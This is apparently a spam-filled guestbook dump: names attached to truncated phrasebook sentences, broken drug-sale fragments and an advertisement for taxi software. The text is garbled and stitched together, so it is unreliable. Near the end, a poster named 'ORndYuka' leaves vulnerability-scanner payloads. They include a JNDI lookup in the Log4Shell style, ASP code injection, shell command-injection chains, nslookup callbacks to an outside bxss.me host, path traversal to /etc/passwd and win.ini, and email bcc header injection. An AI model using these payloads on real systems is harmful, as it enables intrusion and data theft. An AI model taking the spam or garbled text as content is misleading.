Nelson : Have you seen any good films recently? .
Paris : I don't know what I want to do after university .
Zachery : I'm a housewife .
Michale : I'd like to transfer some money to this account .
Jarred : I'm from England .
Lauren : Could I have an application form? .
Brendon : this is be cool 8) .
Brady : Looking for work .
Calvin : International directory enquiries .
Coolman : I live here .
Keneth : Your account's overdrawn .
Stephen : We were at school together .
Grover : Punk not dead .
Molly : I'd like to pay this in, please .
Stephan : Could I borrow your phone, please? .
Arlen : I'm a member of a gym .
Philip : Have you got a telephone directory? .
Darwin : Another year .
Donovan : A staff restaurant .
Zachariah : What's the exchange rate for euros? .
Gilbert : When do you want me to start? .
Norman : Nice to meet you .
Jerry : I really like swimming .
Marcelino : Who would I report to? .
Royce : What sort of work do you do? .
Daren : What sort of work do you do? .
Napoleon : In tens, please (ten pound notes) .
Werner : A company car .
Garrett : I hate shopping .
Kelly : I don't like pubs .
Rolland : I'm only getting an answering machine .
Barton : Can I use your phone? .
Brain : Is this a temporary or permanent position? .
Razer22 : Remove card .
Grace : Your cash is being counted .
Alphonso : Children with disabilities .
Natalie : I'm afraid that number's ex-directory .
Nolan : How do you spell that? .
Xavier : How do you know each other? .
Kelley : Have you got any ? .
Jimmy : I work here .
Seymour : How long have you lived here? .
Nathaniel : I'm interested in .
Elias : I'm interested in .
Marvin : I'm not interested in football .
Elroy : It's funny goodluck .
Raymon : Have you got any experience? .
Ignacio : I'd like to open a personal account .
Oswaldo : Not available at the moment .
Carmen : I'm sorry, he's .
Joshua : Jonny was here .
Tyler : My battery's about to run out .
Wesley : I can't hear you very well .
Roscoe : I'm self-employed .
Fritz : I'd like to speak to someone about a mortgage .
Lonny : It's OK .
Blaine : Could you tell me the number for ? .
Eldon : Directory enquiries .
Emma : Whereabouts in are you from? .
Avery : What part of do you come from? .
Abram : Stolen credit card .
Bennett : It's OK .
Andres : I can't stand football .
Rosario : Sorry, I ran out of credit .
Efrain : How long have you lived here? .
Benny : How much notice do you have to give? .
Keneth : I can't stand football .
Roberto : The National Gallery .
Filiberto : A jiffy bag .
Tristan : Could I have a statement, please? .
Israel : Whereabouts in are you from? .
Kelvin : I like watching football .
Florentino : I can't get through at the moment .
Elvis : I'm happy very good site .
Nevaeh : I'd like to withdraw $100, please .
Miquel : I quite like cooking .
Everette : What sort of music do you like? .
Ahmed : An envelope .
Bonser : I'd like to tell you about a change of address .
Diego : I'm not sure .
Royal : What's the exchange rate for euros? .
Darin : I came here to study .
Jason : Another service? .
Mario : I'd like to transfer some money to this account .
Winston : Could I borrow your phone, please? .
Benedict : I'd like to send this letter by .
Matthew : I have my own business .
Preston : I'm in my first year at university .
Liam : This is your employment contract .
Andres : Why did you come to ? .
Irwin : I do some voluntary work .
Heriberto : Your cash is being counted .
Dominique : I've got a part-time job .
Tobias : What's your number? .
Ambrose : I've lost my bank card .
Dannie : Three years .
Hailey : I came here to work .
Barbera : I read a lot .
Antonia : Who's calling? where can i .
Mario : I've got a full-time job .
Nogood87 : Another year .
Humberto : Special Delivery .
Marty : I'm doing a phd in chemistry .
Donovan : Wonderfull great site .
Grace : What sort of music do you like? .
Porter : Where do you come from? .
Armando : Gloomy tales .
Dexter : A financial advisor .
Fletcher : Canada>Canada .
Earnest : Very Good Site .
Darnell : My battery's about to run out .
Virgilio : We'd like to offer you the job .
Arlen : What do you want to do when you've finished? .
Dalton : I like watching TV .
Harris : The United States .
Marcos : I'd like to transfer some money to this account .
Millard : I work here .
Victor : How long are you planning to stay here? .
Josef : The manager .
Arianna : Where did you go to university? .
Pasquale : Insufficient funds .
Harley : Good crew it's cool :) .
Darius : Have you read any good books lately? .
Josef : I can't get a signal .
Johnie : Your account's overdrawn .
Devin : Other amount .
Edmond : Very funny pictures .
Jerome : I work for a publishers .
Dustin : Whereabouts in are you from? .
Carmen : I'd like to open a personal account .
Alonzo : Could you ask him to call me? .
Isiah : Could I borrow your phone, please? .
Neville : When can you start? .
Eugene : It's OK .
Arianna : I'm doing a phd in chemistry converti .
Rufus : I'd like to pay this in, please .
Autumn : I'm retired .
Moshe : I've just graduated velcade .
DE : Is there ? bu .
Mia : Thanks funny site .
Willis : Sorry, I ran out of credit .
Jenna : I'd like to order some foreign currency .
Gerardo : I'm originally from Dublin but now live in Edinburgh .
Sterling : Accountant supermarket manager .
Palmer : Thanks funny site .
Enrique : Could I take your name and number, please? .
Curtis : magic story very thanks .
Fermin : I'm self-employed .
Branden : Are you a student? .
Zachary : I went to .
Norberto : real beauty page .
Charlotte : I went to .
Winfred : I'm self-employed .
Nickolas : We've got a joint account buy .
Errol : Have you got any ? buy k .
Unlove : I've got a very weak signal buy naltrex .
Chester : Please call back later bu .
Reynaldo : Get a job buy elavil online .
Darron : A staff restaurant flagyl .
Howard : Not available at the moment .
Hobert : I'm afraid that number's ex-directory .
Manuel : I'd like to send this to a .
Winston : Whereabouts are you from? .
Douglass : Lost credit card buy indome .
Derek : I'm at Liverpool University where c .
Gustavo : What sort of work do you do? .
Mervin : Where's the nearest cash machine? buy tamsulosin 0.4 m .
Rodney : Thanks for calling can i .
Sergio : I'm not interested in football buy det .
Kenton : What line of work are you in? buy detrol no pre .
Israel : I'd like to open a personal account .
Shawn : Did you go to university? .
Columbus : I'd like some euros .
Erasmo : Best Site Good Work st .
Kenneth : I'd like to send this letter by .
Jesus : Could I have an application form? .
Carol : I don't know what I want to do after university where .
Freddy : No, I'm not particularly sporty .
Elvis : I've just started at buy h .
Jessica : Have you got any qualifications? .
Jerrell : What's your number? .
Lowell : A financial advisor .
Simon : A staff restaurant generic .
Augustus : How many are there in a book? .
Hollis : I work with computers orde .
Keven : What's the interest rate on this account? .
Wilfred : Jonny was here buy s .
Bernardo : An estate agents .
Jeremiah : A company car .
Francesco : I'm originally from Dublin but now live in Edinburgh .
Jackie : I'm from England .
Edmond : Will I get paid for overtime? .
Myron : very best job .
Theron : Sorry, I ran out of credit .
Billie : I do some voluntary work .
Jocelyn : Photography .
Franklin : I'd like to withdraw $100, please .
Makayla : I work for myself .
Lioncool : I've come to collect a parcel .
Fausto : I can't stand football .
Ervin : The United States .
Marvin : Why did you come to ? .
Brenton : Please call back later .
Alfred : A book of First Class stamps .
DE : I'd like to order some foreign currency .
Demetrius : Jonny was here .
Mervin : I'm from England .
Clifford : I'm self-employed .
Willard : I'm in a band .
Derick : Wonderfull great site .
Katherine : This site is crazy :) .
Waldo : Excellent work, Nice Design .
Snoopy : We were at school together buy n .
Hassan : History .
Lillian : We went to university together .
Heath : Did you go to university? .
Miquel : Good crew it's cool :) .
Craig : The National Gallery .
Reggie : Yes, I play the guitar .
Jamey : I can't get a dialling tone .
Dallas : We went to university together .
Alfonso : I'm only getting an answering machine .
Freelife : I'm in my first year at university .
Floyd : An accountancy practice .
Jewel : Could I order a new chequebook, please? .
Sean : Another year b .
Crazyivan : I quite like cooking .
Nogood87 : Looking for a job .
Jermaine : Do you know what extension he's on? .
Nathanial : Could you please repeat that? .
Travis : I'm only getting an answering machine avodar .
Owen : Can I call you back? .
Hilario : When can you start? avod .
Hershel : US dollars .
Derick : Looking for a job .
Emory : I do some voluntary work .
Barney : How do you know each other? .
Mia : I'm a partner in .
Donovan : Where's the postbox? .
Royce : Withdraw cash .
Benedict : Can I take your number? .
Ronny : Get a job .
Nevaeh : Gloomy tales or .
Alexa : Do you like it here? .
Freeman : I work for myself .
Lillian : Whereabouts in are you from? .
Tommy : In tens, please (ten pound notes) .
Jerold : We need someone with experience .
Wilmer : How much is a Second Class stamp? .
Dwain : We used to work together .
Kayla : Please call back later .
Jerry : I'd like to pay this in, please .
Dro4er : Children with disabilities .
Jimmy : How do you do? .
Sterling : Sorry, you must have the wrong number .
Audrey : Good crew it's cool :) .
Boyce : real beauty page .
Jamey : I'll text you later .
Faith : Stolen credit card .
Francesco : I'll send you a text .
Ronny : What sort of music do you like? .
Harland : A First Class stamp .
Vicente : Languages .
Patric : Through friends .
Lioncool : What are the hours of work? .
Sophie : We need someone with experience .
Philip : I enjoy travelling .
Kidrock : I didn't go to university .
Dusty : We're at university together .
Brady : What line of work are you in? .
Getjoy : Directory enquiries .
Xavier : Looking for a job .
Benjamin : Go travelling .
Ernie : Which team do you support? .
Dylan : When do you want me to start? .
Warren : I like it a lot .
Valentin : How long have you lived here? .
Byron : We're at university together buy aciphe .
Malcolm : magic story very thanks .
Delmer : Photography .
Bernie : Gloomy tales .
Richard : I'd like to open a business account .
Ezekiel : We're at university together .
Tommy : I'm on work experience .
Judson : I never went to university .
Brody : Sorry, I ran out of credit .
Cristobal : Can I use your phone? .
Donnell : How would you like the money? .
Paris : I'm in my first year at university .
Harrison : I enjoy travelling .
Cristopher : Your cash is being counted .
Francesco : Could I make an appointment to see ? .
Alonso : Photography .
Elwood : We'll need to take up references .
Danial : This site is crazy :) .
Isaiah : I came here to work .
Stanford : Can I call you back? .
Dudley : We were at school together .
Donovan : Excellent work, Nice Design .
Connor : How many weeks' holiday a year are there? .
Robin : It's serious .
Khloe : I'm on holiday .
Christian : Could you ask him to call me? .
Perry : We need someone with experience .
Aiden : What sort of work do you do? .
Valentine : Another year .
Wiley : How much is a First Class stamp? .
Gabriel : I'm doing a phd in chemistry .
Kidrock : Can you put it on the scales, please? .
Bailey : We'd like to offer you the job .
Randolph : History .
Lemuel : We've got a joint account .
Abigail : Do you need a work permit? .
Jarvis : Excellent work, Nice Design .
Lawerence : Where do you come from? .
Oswaldo : Can you put it on the scales, please? .
Eugenio : Thanks funny site .
Luciano : I'd like , please .
Octavio : Yes, I play the guitar .
Rueben : I stay at home and look after the children .
Marion : Recorded Delivery .
Gerry : A packet of envelopes .
Nickolas : Insufficient funds .
Marissa : US dollars .
Damian : Could I have , please? .
Harold : Have you got a current driving licence? .
Clayton : I'd like to pay this cheque in, please .
Moshe : Remove card .
Adolph : Sorry, I'm busy at the moment .
Katelyn : Through friends .
Gianna : this is be cool 8) .
Leonel : Did you go to university? .
Herbert : I saw your advert in the paper .
Ferdinand : A jiffy bag .
Plank : I work for a publishers .
Gilbert : i'm fine good work can .
Jamison : A packet of envelopes .
Donnell : I'm about to run out of credit .
Julius : I'd like to apply for this job .
Stephanie : I'd like to take the job .
Jessica : Get a job .
Scottie : The National Gallery .
Nilson : I hate shopping .
Vance : I've only just arrived .
Samuel : Could you tell me the dialing code for ? .
Friend35 : Would you like to leave a message? .
Kayla : I'd like to open a personal account .
William : Why did you come to ? .
Danny : Which year are you in? .
Issac : I read a lot .
Ellis : Do you know each other? .
Sophie : Would you like a receipt? .
Jeromy : What do you study? .
Matthew : I'm doing a masters in law .
Maximo : Could I ask who's calling? .
Gerard : I'm a partner in .
Norbert : Could I make an appointment to see ? .
Paris : Could I ask who's calling? .
Elton : I'm doing a phd in chemistry .
Prince : I'm self-employed .
Luther : A financial advisor .
Lindsay : Best Site good looking buy sy .
Mike : When can you start? .
Willian : i'm fine good work .
Edwardo : Excellent work, Nice Design .
Dario : What company are you calling from? .
Dwayne : What line of work are you in? .
Fredric : Hold the line, please .
Israel : Would you like to leave a message? .
Fermin : I'm not sure .
Octavio : good material thanks .
Rodrick : Will I have to work shifts? .
Giuseppe : Yes, I love it! .
Jonathan : Could you please repeat that? .
Parker : I'm on holiday .
Kelly : What's the last date I can post this to to arrive in time f .
Jimmi : When do you want me to start? .
Delmer : Sorry, you must have the wrong number .
Delbert : Have you got any experience? .
Alfredo : I live in London .
Foster : I love the theatre .
Myron : Would you like a receipt? .
Josiah : When do you want me to start? .
Autumn : We need someone with experience .
Francis : Where's the postbox? .
Serenity : I'm on business .
Moses : I've only just arrived .
Ethan : I'm afraid that number's ex-directory .
Oscar : I never went to university .
Wilbur : Where are you calling from? .
Layla : Get a job .
Lucien : How would you like the money? .
Clifford : We used to work together .
Jordan : I'm not interested in football .
Esteban : Do you know the number for ? .
Leslie : Whereabouts are you from? .
Charles : I work here metf .
Quinton : I'd like to send this letter by .
Gregory : Have you got any experience? .
Porter : Could I have a statement, please? .
Scott : What do you like doing in your spare time? .
Jesus : What do you like doing in your spare time? .
Gaston : I'd like to change some money .
Lorenzo : Do you know what extension he's on? .
Augustine : I can't get through at the moment .
Goodboy : Is there ? .
Peter : Until August .
Grady : I work for a publishers .
Shelby : Who do you work for? .
Trevor : Which year are you in? .
Addison : I was made redundant two months ago .
Michel : Could I order a new chequebook, please? .
Landon : Cool site goodluck :) .
Corey : Canada>Canada .
Hector : What do you study? .
Chris : Very Good Site .
Elizabeth : I like it a lot .
Charlotte : Very Good Site .
Stuart : What do you do? .
Cody : this is be cool 8) .
Merlin : How much does the job pay? .
Mickey : magic story very thanks .
Alfred : Is it convenient to talk at the moment? .
Phillip : I'm doing a masters in law .
Caden : Which team do you support? .
Merrill : The United States where can .
Trevor : I'd like to cancel this standing order .
Augustine : I was born in Australia but grew up in England .
Monroe : Where do you study? .
Melissa : Could you tell me the number for ? .
Diego : Have you got any ? .
Ronnie : How long have you lived here? price .
Willy : Very funny pictures .
Deadman : I'd like to send this parcel to .
Cesar : real beauty page .
Jeremy : Will I get paid for overtime? .
Houston : I'm a housewife .
DE : Could I ask who's calling? .
Monte : Insufficient funds buy me .
Horacio : There's a three month trial period .
Jessie : Will I get paid for overtime? .
Gavin : Where are you from? .
Jeremiah : I don't like pubs .
Edwin : Could I borrow your phone, please? .
Amelia : What sort of work do you do? .
Leland : I enjoy travelling .
Gayle : How long have you lived here? .
Silas : Get a job .
Garry : What's the last date I can post this to to arrive in time f .
Douglas : What's the interest rate on this account? .
Elroy : International directory enquiries .
Teodoro : Which team do you support? .
Manual : Which team do you support? .
Nigel : Very Good Site .
Jackie : Another service? .
Clemente : Do you play any instruments? .
Jacob : real beauty page .
Alphonse : I'm on holiday .
Ahmed : Excellent work, Nice Design .
Nolan : very best job .
Hiram : This is the job description .
Oscar : How do you do? .
Kristofer : I'm sorry, I'm not interested .
Valentine : Excellent work, Nice Design .
Gobiz : I was born in Australia but grew up in England .
Reynaldo : Are you a student? .
Ahmad : this post is fantastic .
Stanton : I was born in Australia but grew up in England .
Galen : I'd like to send this letter by .
Kidrock : I really like swimming .
Marcelino : I'm unemployed .
Alvaro : A financial advisor .
Jefferson : Where are you calling from? .
Prince : What's the interest rate on this account? .
Andrea : Canada>Canada .
Micah : We've got a joint account .
Shawn : What's the exchange rate for euros? .
Kidrock : I'd like to withdraw $100, please .
Kendall : What do you like doing in your spare time? .
Lanny : I've got a part-time job .
Hilario : Can you hear me OK? .
Brant : Where's the nearest cash machine? .
Freddy : One moment, please .
Kenneth : I'm doing a masters in law .
Kelley : Which team do you support? .
Ashley : I came here to work .
Glenn : Which university are you at? .
Lucky : Is this a temporary or permanent position? .
Clayton : I'm retired .
Jefferson : Not in at the moment .
Lanny : I'd like to cancel a cheque .
Hobert : I'd like to pay this cheque in, please .
Victor : I'm sorry, she's .
Emily : One moment, please .
Hosea : Will I be paid weekly or monthly? .
Mckinley : I'd like to tell you about a change of address .
Ruben : Looking for a job .
Gilberto : Could I borrow your phone, please? .
Spencer : I'm doing a masters in law .
Houston : We're at university together .
Janni : I'd like to apply for this job .
Jeffery : Please wait .
Alejandro : Free medical insurance .
Eli : I've been cut off .
Robbie : I'd like to pay this cheque in, please .
Kenny : Yes, I love it! .
Alyssa : I'd like to speak to someone about a mortgage .
Daniel : How many days will it take for the cheque to clear? .
Lavern : A packet of envelopes .
Dario : Could I take your name and number, please? .
Randolph : I need to charge up my phone .
Wilfred : We need someone with experience .
Wilbert : Languages .
Ayden : Did you go to university? .
Giovanni : What's the last date I can post this to to arrive in time f .
Jayson : Will I get paid for overtime? .
Jeremiah : This is the job description .
Alphonso : What university do you go to? .
Faustino : Could I ask who's calling? .
Stefan : I came here to study .
Brett : I went to .
Gaylord : A packet of envelopes .
Galen : I'm interested in .
Milford : I'll put her on .
Dannie : How long are you planning to stay here? .
Lily : I'm sorry, she's .
Oswaldo : this post is fantastic .
Tilburg : Best Site Good Work .
Eliseo : We've got a joint account .
Percy : This site is crazy :) .
Brett : I'm not interested in football .
Anderson : Other amount .
Floyd : What do you do for a living? .
Addison : We'd like to offer you the job .
Kareem : This is the job description .
Courtney : I saw your advert in the paper .
William : Will I be paid weekly or monthly? .
Connor : What do you study? ni .
Brain : How much were you paid in your last job? .
Hollis : Wonderfull great site .
Aaliyah : I support Manchester United .
Valentin : It's a bad line .
Fernando : I'd like to withdraw $100, please .
Marcelo : It's OK .
Dannie : Do you like it here? .
Augustus : I read a lot .
Grant : I'd like to open an account .
Graig : Do you play any instruments? .
Eldon : US dollars .
Alexander : Where do you study? .
Edmundo : very best job .
Amia : I'm doing an internship .
Lawrence : History .
Humberto : I'll put him on .
Ernie : this post is fantastic .
Darryl : What do you do for a living? .
Florentino : I can't stand football .
Freddie : Do you like it here? .
Mason : I'd like to take the job .
Lionel : Do you play any instruments? .
Deadman : I was born in Australia but grew up in England .
Lightsoul : What are the hours of work? .
Ryan : Can I use your phone? .
Amber : Sorry, you must have the wrong number .
Demarcus : I'd like to change some money .
Elton : I'd like some euros .
Royal : Could I have , please? .
Terence : How many would you like? .
Jeffry : Not in at the moment .
Emily : I love the theatre .
Brenton : Just over two years .
Kidrock : I love the theatre .
Ferdinand : Could you ask him to call me? .
Marlon : Through friends .
Carey : Three years .
Jason : International directory enquiries .
Lucio : I'll send you a text .
Miguel : I'd like to tell you about a change of address .
Derek : Have you seen any good films recently? .
Cameron : The United States .
Alvaro : Some First Class stamps .
Melvin : I'm training to be an engineer .
Donald : This is your employment contract .
Abram : I'm originally from Dublin but now live in Edinburgh .
Wendell : Have you got any ? .
Marcelino : Until August .
Kraig : I'll text you later .
Thomas : I'm doing a masters in law .
Harrison : Yes, I love it! .
Anderson : Nice to meet you .
Percy : Special Delivery .
Mitchel : I came here to work .
Perry : I work for myself .
Isreal : I'd like to tell you about a change of address .
Nickolas : Is there ? .
Jamal : Hold the line, please .
Rupert : Could I take your name and number, please? .
Ernest : A staff restaurant .
Spencer : This site is crazy :) .
Wayne : What do you study? .
Curt : Very Good Site .
Ashley : What part of do you come from? .
Booker : A First Class stamp .
Danilo : Yes, I love it! .
Adrian : Which university are you at? .
Brenton : Can I take your number? .
Sheldon : Could you ask him to call me? .
Micah : I can't get a dialling tone .
Kaylee : Is it convenient to talk at the moment? .
Theodore : What's your number? .
Camila : I never went to university .
Lifestile : I'd like to speak to someone about a mortgage .
Kerry : Have you seen any good films recently? .
Jamison : Could you give me some smaller notes? .
Seth : Not in at the moment .
Branden : I can't get a signal .
Davis : I have my own business .
Edmund : I'm training to be an engineer .
Thebest : Do you need a work permit? .
Zoey : Could I make an appointment to see ? .
Leonel : Looking for work .
Diana : I'd like , please .
Lucius : I want to report a .
Darrin : I'm originally from Dublin but now live in Edinburgh .
Manuel : Good crew it's cool :) .
Makayla : I'd like some euros .
Clayton : Which year are you in? .
Claud : In a meeting .
Errol : i'm fine good work .
Armando : What's your number? .
Luke : What's the interest rate on this account? .
Porfirio : Punk not dead .
Henry : Good crew it's cool :) .
Chance : Nice to meet you buy .
Hershel : It's funny goodluck buy .
Alphonso : I'm only getting an answering machine .
Anna : We used to work together .
Carmine : Free medical insurance .
Jacques : We went to university together .
Heyjew : A law firm .
Alyssa : I'm doing an internship clomid .
Lindsey : Thanks funny site .
Gabriel : A Second Class stamp .
Ian : Stolen credit card .
Harrison : I stay at home and look after the children .
Hassan : I've got a part-time job .
Parker : I want to report a .
Michael : How do I get an outside line? .
Kelley : I love this site .
Augustus : A few months .
Jada : How much is a First Class stamp? .
Jonas : Thanks funny site .
Trevor : Very funny pictures .
Claude : Sorry, you must have the wrong number .
Quentin : An accountancy practice .
Rudolf : An accountancy practice .
Javier : Can I use your phone? .
Reinaldo : A staff restaurant order .
Fletcher : Will I be paid weekly or monthly? .
Harvey : A Second Class stamp .
Irea : It's a bad line .
Deadman : Could I ask who's calling? .
Ambrose : We're at university together .
Eliseo : In a meeting .
Giuseppe : I'm a trainee .
Rayford : Have you got a current driving licence? .
Bennett : I'm on holiday purchase .
Russel : Not available at the moment .
Gilbert : When do you want me to start? .
Rebecca : Cool site goodluck :) .
Archie : I'm not working at the moment .
Carson : Another service? .
Gregg : Could you please repeat that? .
Lemuel : What university do you go to? .
Kraig : How many would you like? ord .
Damian : Would you like to leave a message? .
Louie : Canada>Canada .
Ernie : How much were you paid in your last job? .
Esteban : I don't know what I want to do after university .
Delmer : It's OK .
Mia : I really like swimming .
Mohamed : How many more years do you have to go? .
Perry : How many are there in a book? .
Jamison : I'm not interested in football .
Ashton : magic story very thanks .
Benito : We used to work together .
Derek : I can't stand football .
Mervin : Hello good day .
Darnell : I'm doing an internship .
Kyle : US dollars .
Edmond : What's the interest rate on this account? .
Kyle : Very funny pictures .
Walton : A book of First Class stamps .
Freelove : Gloomy tales .
Sierra : International directory enquiries .
Cole : I'd like to pay this in, please .
Bob : Sorry, I ran out of credit .
Royce : Could I ask who's calling? .
Whitney : Best Site good looking .
Wilfred : I'm on a course at the moment .
Arianna : An envelope .
Isabelle : What sort of music do you listen to? .
Philip : Very Good Site .
Lamont : Why did you come to ? .
Reynaldo : I don't know what I want to do after university .
Dannie : I study here .
Elton : I work here .
Ryan : My battery's about to run out .
Arnoldo : Good crew it's cool :) .
Wiley : We went to university together .
Jeffrey : I live here .
Sanford : Have you got any ? .
Sean : I've just started at .
Daniel : Incorrect PIN .
Israel : It's funny goodluck .
Jerald : I'd like to take the job .
Wayne : A Second Class stamp .
Milan : An envelope .
Randolph : Can you put it on the scales, please? .
Riley : I'm on a course at the moment .
Cornell : History .
Bradford : Can you hear me OK? .
Sierra : I'm sorry, she's .
Frankie : Could I have a statement, please? .
Rikky : I'd like to order some foreign currency .
Reuben : Have you got any qualifications? .
Jermaine : When can you start? .
Nathanael : The line's engaged .
Vincent : Hello good day .
Eduardo : It's serious .
Riley : I came here to work .
Carson : I'm about to run out of credit .
Nicholas : What's the current interest rate for personal loans? .
Kidrock : Some First Class stamps .
Luke : Which team do you support? .
Dwain : Have you read any good books lately? .
Lucas : I've been made redundant .
Michal : I'd like to tell you about a change of address .
German : Where's the nearest cash machine? .
Ezequiel : We'll need to take up references .
Maria : A few months .
Earle : What's the exchange rate for euros? .
Terence : I quite like cooking .
Josue : I'm self-employed .
Christophe : Are you a student? .
Eva : This is the job description .
Arlen : I didn't go to university .
Johnie : What university do you go to? .
Buford : About a year .
Antwan : One moment, please .
Columbus : good material thanks .
Wilmer : I'd like to pay this cheque in, please .
William : I'd like to speak to someone about a mortgage .
Tracy : Do you like it here? .
Scottie : Languages .
Issac : Could I ask who's calling? .
Harland : Whereabouts in are you from? .
Caleb : The United States .
Brooks : Good crew it's cool :) .
Lillian : Can I take your number? .
Madison : Do you know the address? .
Kendall : We need someone with experience .
Kyle : I'd like to pay this in, please .
Lance : Could you please repeat that? .
Dominique : What do you want to do when you've finished? .
Freddie : Where do you come from? .
Darrel : Some First Class stamps .
Carlo : Please call back later .
Tyron : I'm self-employed .
Destiny : One moment, please .
Marcel : We're at university together .
Anderson : I do some voluntary work .
Lauren : An accountancy practice .
Harvey : I can't stand football .
Ricardo : Where's the nearest cash machine? .
Abigail : What do you like doing in your spare time? .
Amelia : Do you have any exams coming up? .
Amia : We work together .
Dylan : I like it a lot .
Fermin : I'm doing a phd in chemistry .
Brody : We'd like to offer you the job .
Nicolas : It's OK .
Clifford : I can't get a dialling tone .
Colton : I like it a lot .
Jermaine : How much will it cost to send this letter to ? .
Mitch : I'm only getting an answering machine .
Kevin : Recorded Delivery .
Brandon : The National Gallery .
Duane : This site is crazy :) .
Elliot : International directory enquiries .
Kareem : A Second Class stamp .
Christoper : A company car .
Arnoldo : Your account's overdrawn .
Leonardo : Where do you live? .
Alex : No, I'm not particularly sporty .
Carey : I'm not working at the moment .
Sheldon : How would you like the money? .
Theodore : How would you like the money? .
Terry : Can I take your number? .
Zackary : Could you transfer $1000 from my current account to my depos .
Adrian : Until August .
Infest : Did you go to university? .
Vince : What's the last date I can post this to to arrive in time f .
Orville : I'll put him on .
Loren : Which team do you support? .
Archie : Until August .
Sean : We need someone with qualifications .
Kermit : We work together .
Carmelo : Have you got any experience? .
Serenity : I'm interested in .
Garrett : Who would I report to? .
Silas : Insufficient funds .
Dennis : Could you tell me my balance, please? .
Ismael : Whereabouts are you from? .
Myles : What do you do for a living? .
Mohammad : this is be cool 8) .
Branden : Who would I report to? .
Moises : I'm only getting an answering machine .
Ernest : I can't hear you very well .
Malik : Whereabouts are you from? .
Lindsay : Another service? .
Arnold : A company car .
Matthew : I'd like to pay this in, please .
Genesis : I'm a partner in .
Ronny : I'm in my first year at university .
Isaias : An estate agents .
Berry : Punk not dead .
Shane : I hate shopping .
Lamont : How do you spell that? .
Mitchel : A Second Class stamp .
Chang : Wonderfull great site .
Audrey : It's funny goodluck .
Rodney : I'd like to cancel this standing order .
Edmundo : Could I order a new chequebook, please? .
Bertram : Whereabouts are you from? .
Sebastian : I can't stand football .
Buford : I hate shopping .
Elton : Sorry, I ran out of credit .
Jeramy : The United States .
Juan : I'm on business .
Donny : I'd like to open a personal account .
Alexa : I'm from England .
Patrick : this post is fantastic .
Wyatt : I'd like to open a personal account .
Elton : I don't know what I want to do after university .
Eblanned : I'm doing a phd in chemistry .
Reuben : I study here .
Dudley : I'm on business .
Ahmad : this is be cool 8) .
Frank : What's the exchange rate for euros? .
Jamie : Will I be paid weekly or monthly? .
Titus : I'm only getting an answering machine .
Cristopher : I'd like a phonecard, please .
Norbert : Did you go to university? .
Palmer : How much is a First Class stamp? pr .
Aidan : this post is fantastic .
Harland : Could I borrow your phone, please? .
Diana : I can't get a signal .
Aubrey : I wanted to live abroad .
Wendell : I'm doing a masters in law .
Nickolas : Photography .
Geraldo : I can't get a signal .
Andres : I'd like to withdraw $100, please .
Willy : What's the last date I can post this to to arrive in time f .
Trevor : We need someone with experience .
Spencer : Why did you come to ? .
Eldon : Very funny pictures .
Walton : How much will it cost to send this letter to ? .
Alejandro : How much is a First Class stamp? .
Arianna : Have you got any experience? .
Esteban : Free medical insurance .
Mauricio : i'm fine good work .
Dorian : How long are you planning to stay here? .
Curtis : Insert your card .
Emory : Where are you calling from? .
Romeo : I study here .
Ronnie : Remove card .
Dusty : Another year .
Elmer : How would you like the money? .
Chester : I can't hear you very well .
Ismael : I love the theatre .
Bryce : I work with computers .
Chung : very best job .
Jefferey : Very funny pictures .
Refugio : Wonderfull great site .
Alexis : I'm a member of a gym .
Sebastian : No, I'm not particularly sporty .
Bailey : International directory enquiries .
Lesley : I've got a full-time job .
Alton : Where do you come from? .
Merlin : I'd like to transfer some money to this account .
Jacinto : I'm not interested in football .
Tyrell : Is it convenient to talk at the moment? .
Dalton : Canada>Canada .
Tyrone : I don't like pubs .
Rogelio : My battery's about to run out .
Robby : Could I have , please? .
Woodrow : Whereabouts in are you from? .
Robbie : I'd like to transfer some money to this account .
Marlin : I've only just arrived .
Herman : How many days will it take for the cheque to clear? .
Hobert : I do some voluntary work .
Incomeppc : Could I have , please? .
Marshall : Punk not dead .
Patricia : Have you got a current driving licence? .
Keith : i'm fine good work .
Lucien : How many days will it take for the cheque to clear? .
Dogkill : What university do you go to? .
Rebecca : Can I take your number? .
yjczixpe : QaLAXuojYodeoFFT .
Syed Ahmed : Envoy Taxi Dispatch System providing world class all-in-one .
Syed Ahmed : https://www.taxicabsoftware.com .
ORndYuka : 1 .
ORndYuka : ${j${::-n}di:dns${::-:}//hitbnqodmgvhyfd968${::-.}bxss.me} .
${j${::-n}di:dns${:: : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : response.write(9400408*9856588) .
ORndYuka : 1 .
ORndYuka : '+response.write(9400408*9856588)+' .
ORndYuka : "+response.write(9400408*9856588)+" .
ORndYuka : 1 .
response.write(93930 : 1 .
'+response.write(939 : 1 .
ORndYuka : 1'>"> .
"+response.write(939 : 1 .
ORndYuka'>"> : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : 1 .
ORndYuka : echo xuaoba$()\ dmtszf\nz^xyu||a #' &echo xuaoba$()\ dmtszf\nz^xyu||a #|" &echo xuaoba$()\ dmtszf\nz^xyu||a # .
ORndYuka : G9IN5wIg .
ORndYuka : &echo fvoije$()\ eznqol\nz^xyu||a #' &echo fvoije$()\ eznqol\nz^xyu||a #|" &echo fvoije$()\ eznqol\nz^xyu||a # .
6MsuWhEy : 1 .
ORndYuka : |echo sqhlpm$()\ qkjvxu\nz^xyu||a #' |echo sqhlpm$()\ qkjvxu\nz^xyu||a #|" |echo sqhlpm$()\ qkjvxu\nz^xyu||a # .
ORndYuka : 1 .
ORndYuka : (nslookup hitsczieqwfdna5492.bxss.me||perl -e "gethostbyname('hitsczieqwfdna5492.bxss.me')") .
ORndYuka : ../../../../../../../../../../../../../../etc/passwd .
ORndYuka : 1 bcc:009247.9-3207.9.f7d48.18986.2@bxss.me .
ORndYuka : $(nslookup hitedbrhxrtmp3d3cc.bxss.me||perl -e "gethostbyname('hitedbrhxrtmp3d3cc.bxss.me')") .
ORndYuka : ../../../../../../../../../../../../../../windows/win.ini .
ORndYuka : to@example.com> bcc:009247.9-3208.9.f7d48.18986.2@bxss.me .
ORndYuka : &(nslookup hitnvhhzwxfdr47339.bxss.me||perl -e "gethostbyname('hitnvhhzwxfdr47339.bxss.me')")&'\"`0&(nslookup hitnvhhzwxfdr47339.bxss.me||perl -e "gethostbyname('hitnvhhzwxfdr47339.bxss.me')")&`' .
ORndYuka : 1 .
ORndYuka bcc:009247. : 1 .
ORndYuka : |(nslookup hitgsmheeabkf68ff0.bxss.me||perl -e "gethostbyname('hitgsmheeabkf68ff0.bxss.me')") .
ORndYuka : ../1 .
to@example.com> bcc : 1 .
